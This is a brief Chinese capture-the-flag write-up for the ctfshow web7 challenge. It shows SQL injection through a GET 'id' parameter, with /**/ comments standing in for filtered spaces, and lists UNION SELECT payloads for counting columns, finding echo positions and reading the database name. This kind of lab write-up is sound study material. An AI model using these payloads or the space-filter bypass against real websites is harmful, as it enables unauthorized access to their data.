CTFshow-Web-SQL注入空格过滤绕过GET类型
一、靶场:ctfshow web7
二、解题步骤:
步骤一:观察页面发现有几个链接,点开后发现url上面疑似存在注入点


步骤二:测试注入点;由前面的结论可知,该注入点为数字型,使用万能语句进行测试:?id=1 and 1=1#

发现疑似存在web6靶场的过滤机制,即将空格进行过滤,这里尝试将空格替换为/**/,即:?id=1/**/and/**/1=1#

发现可以正常显示了
步骤三:判断列数
列数<=3时正常显示:?id=1/**/order/**/by/**/3;#

列数>3时不正常显示:?id=1/**/order/**/by/**/4;#

步骤四:判断回显位:?id=1/**/union/**/select/**/1,2,3;#

步骤五:爆表名:?id=1/**/union/**/select/**/1,database(),3;#

到这里就可以发现其实和web6靶场后面的注入是一样的,他们的区别主要就在于本靶场为url的get类型注入,web6为post注入,后续操作与web6一致,这里不做赘述。

浙公网安备 33010602011771号